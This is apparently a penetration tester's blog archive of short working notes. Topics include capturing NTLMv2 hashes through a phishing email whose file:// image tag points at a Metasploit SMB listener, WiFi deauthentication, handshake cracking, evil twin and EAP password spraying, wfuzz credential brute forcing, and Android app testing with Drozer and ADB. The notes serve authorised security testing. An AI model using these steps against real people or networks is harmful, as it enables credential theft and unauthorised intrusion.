Category Archives: Pentesting

SMB Email

Not a new thing, just like most other posts, this is documentation.

If internal network access, scan with nmap for egress access, especially for port 445 and 139:

nmap -T4 -p0-65535 –max-retries 1 -sS -oA sweep_egress egadz.metasploit.com

If it’s closed, this probably isn’t going to work. If there is no access to test that, we’re flying blind and just hoping here.

Set up a listener on metasploit, I like auxiliary/server/capture/smb because it’s just so easy. Nothing to configure. Just “use” it and run.

Next, create an email for the target. In the email, include an html image tag and use file:// for the scheme. Point it to the metasploit server, and reference some non-existent image. Example: <img src=”file://192.168.1.10/image.jpg” /> This will create a broken image icon in the email, but when the user attempts to load from a Windows machine, the user’s NTLMv2 hash will be sent to the listener.

If you want to also craft a believable phishing email, you could also put a link to a web page that you control and on that web page, also include the same image tag. This is just in case the user’s mail client doesn’t allow downloading of images. But a browser will!

Once hash(es) are captured, shut down the listener and while still in metasploit, enter: creds

This will give the hashes in a format that a password cracker like hashcat will understand. For hashcat, use -m5600 for the NTLMv2 format. Also, ensure there is no extra whitespace around the hashes when loaded into hashcat, or there will be a string length exception.

Run the cracker and pray. If it cracks, congrats! If not in the time allotted, sorry!

 

3 total views, no views today

Create Screenshot Directory

Each week, I create a new directory for the test. It’s where I store notes, reports, artifacts, etc. I also create a screenshot directory and then set my system to auto-save screenshots to there. So I bash scripted it up. Here’s the script that will automatically create the new directory, the screenshot directory and tell my Mac system to save screenshots there:

#!/bin/bash

if [ “$1” == “” ]
then
echo “Usage: ./myscreens.sh [dirname]”
else
mkdir ~/Desktop/$1
mkdir ~/Desktop/jobs/$1/screens
defaults write com.apple.screencapture location ~/Desktop/$1/screens
killall SystemUIServer
fi

27 total views, no views today

WiFi

Doing a Wireless Penetration Test

Make sure you have everything you’ll need, since these always need to be on-site.

  • Computer (even better to bring more than 1), with Kali Linux installed
  • Power cords
  • WiFi Card(s) – at least 1 since they don’t like to work when they need to
  • Different antennas
  • MiFi, since they’re probably not going to let you on the network so easily
  • USB Hub, as the wireless card might need extra power
  • OEM power cords
  • Power strip – there’s a lot to plug in

That’s a good start.

Thanks to Ted Raffle for this writeup.

Start up Kali, plug in the card, run iwconfig to see whether it is connected

Get rid of unnecessary processes: airmon-ng check kill

Start the interface: airmon-ng start wlan0

To see networks and their MAC: airodump-ng –band abg -cswitch 1 wlan0mon

If you need to de-auth: aireplay-ng –deauth <number of packets or 0 for infinite> -a [MAC of AP] -c [MAC of client] wlan0mon

Capture a PSK: airodump-ng wlan0mon -c 1 –bssid [MAC of AP] –write <filename>

Turn handshake value into a hashcat value: wpaclean clean.cap <filename>-01.cap

And: aircrack-ng clean.cap -J hccap

hashcat -m 2500 hccap.hccap -w wordlist rules/rule

Evil Twin:

Have mana installed

Use Nick Sanzotta’s “manaSucks” script:

python manaSucks.py -iwlan0mon -m=<fake MAC address> –hostname ‘anything’ -s<SSID> -c6 –manaloud=0

For brute forcing the EAP network, get usernames, either also from Nick Sanzotta’s WiFiSuite, or from evil twin, or from scraping, use WiFiSuite:

python wifisuite.py -iwlan0mon -s”<SSID>” -u <username file> -p<password> spray

If you get guest network access, test for network segmentation. nmap the neighborhood looking for “up” hosts. If there are any, nmap them for services. Also check for nameservers.

If you get on the corporate network with credentials, it’s essentially now an internal assessment. Pick something to show risk and move on. After all, it’s a wireless assessment.

Test outside the building for access

Plug in a wifi repeater/AP, is it detected? Are there network access controls? (Probably not, and now you have internal access)

40 total views, 1 views today

Getting Organized

Learning how to get organized and put things in the proper place. I suspect that I’ll come back and add things like naming conventions. But this is what I got so far for organizing the information gathered during a pen test, in a directory.

Customer name

  • screenshots
  • services
  • scans
    • nexpose|appscan
    • nmap
      • xml
      • gnmap
      • nmap
    • pings
    • enum

As few nmap scans as possible, and name them after the network or if there is something else that makes sense. So the files may be named 192.168.10.10.gnnmap and so on.
Ping files are named the same way, but are prefixed with ping-
enum files are for enumerating a domain controller. These are prefixed with enum- and end with -dc
Services are IP addresses and the file is named with the service-host
All data is immediately removed and encrypted off the machine and deleted as soon as reasonably possible.

87 total views, no views today

Quick and Dirty Loop

Sometimes you gotta run a command lots of times. So let a loop do it. Here’s one example:

for ip in $(cat ips.txt); do
nslookup $ip >> nslookups.txt
done

This will take a file of IP addresses (ips.txt) and run nslookup on each IP and output the results to nslookups.txt. Or just remove the >> nslookups.txt if you want the output to the screen.

Easy.

91 total views, no views today

nslookup

Parsing nslookup

So today I had to convert IP addresses to hostnames. Seems easy enough, just use nslookup. But I had more than 400 IPs that needed to be converted. Ugh. So we need to do a little parsing.

First, take the IP addresses and get the host information. Let’s script this.

for ip in $(cat ips.txt); do
    nslookup $ip >> nslookups.txt
done

This will do an nslookup for each of the IPs in the ips.txt file. Great! Now we need to parse it. This should be pretty easy to just look for “name=” except sometimes, there isn’t a hostname and then “name=” doesn’t appear. So instead we look for something else that is always in there, regardless of whether there is a hostname. It seems the string “arpa” matches this. So the next step is to find that and then cut the hostname, or something that doesn’t look like a hostname if there isn’t one.

grep arpa nslookups.txt | cut -d " " -f3 > hostnames.txt

When this finishes, the hostnames.txt file will have one string per line, either the hostname or the word “can’t”. At this point, do a find/replace for “can’t” and make it blank (since there isn’t a hostname for that IP).

Now you have two files, one with all the IPs and one with the hostnames. Put them in two Excel columns and match them up. There is one more problem here that I haven’t found a good solution for yet. Some of the IPs may have more than one hostname. So when you match up the columns in Excel, you’ll likely have more hostnames than IPs. Unfortunately the only solution I have so far is to read through the nslookups.txt file, find the entries with more than one hostname and then manually fix this in the Excel file. It takes a little bit of time, but definitely better than running nslookup manually hundreds of times.

156 total views, no views today

Using WFuzz

Had a little bit of trouble figuring it out, so adding the format that I found here:

# wfuzz -c -z file,/usr/files/userfile -z file,/usr/files/passfile –ntlm FUZZ:FUZ2Z https:///

In a nutshell, the -z coincides with the “FUZZ”. Each subsequent payload/FUZZ combination points to the FUZ2Z or FUZ3Z and so on.

WFuzz Project

145 total views, no views today

sshdroid

sshdroidOnce sshdroid (https://play.google.com/store/apps/details?id=berserker.android.apps.sshdroid&hl=en) is installed on a rooted device, start zipping around, like in /data/user/0/<packagename>/shared_prefs

But to log on, first might need to turn off “Enable root” in sshdroid. But after logging in to: ssh root@<ip> -p 2222 then simply su.

208 total views, no views today

Drozer and ADB

ADB, the Android Debugging Bridge. If you want it to connect to Android > 4.2.2, or in other words, anything from this century, you can’t use anything less than ADB 1.0.31. By default, mobisec comes with 1.0.29, so even if the device is rooted, the device appears to be offline.

To upgrade adb: First download android-sdk-linux, from here: https://developer.android.com/studio/index.html near the bottom where is says “Just the tools” Once you download, unzip and all that, cd into android-sdk-linux and run: tools/android update sdk –no-ui

To get 32-bit adb: http://askubuntu.com/questions/710426/android-sdk-on-ubuntu-32bit, as of this writing, it resulted in version 1.0.32 of adb.

Installing Drozer: (Drozer site) Need the .apk for the device, and the platform. Both are available at the Drozer page. Start up the agent on the device, and it should be running on tcp:31415, then do the port forwarding in the platform. If the device and the platform connect, all good, and fire away!

Extra Drozer Modules: https://github.com/mwrlabs/drozer-modules

Drozer User’s Guide:
https://labs.mwrinfosecurity.com/system/assets/502/original/mwri_drozer-users-guide_2013-07-25.pdf

If we get:
mobisec@mobisec:~$ adb devices
List of devices attached
8753afe5 no permissions

Then stop and start the server with sudo.

Another good resource: https://securitycafe.ro/2015/07/08/mobile-penetration-testing-using-drozer/

Video overview by the developer: https://www.concise-courses.com/infosec/drozer/

190 total views, no views today

Mobile App Testing

As others have done with their blog, I plan to use this as a repository of things I learn, not a “I’m a ninja on this topic, read this to learn everything!”, quite the opposite actually.

Testing android app, get the .apk file, simply download it onto the device and double click the file to install it. Once the file installs, it will be runnable.

To open an .apk file, change the extension to .zip and unzip it. That will include manifests, xml files of information and dex file(s), which is the actual java code that can be decompiled with something like dex2jar (included in Mobisec). Then simply use JD-GUI to read the class files!

125 total views, no views today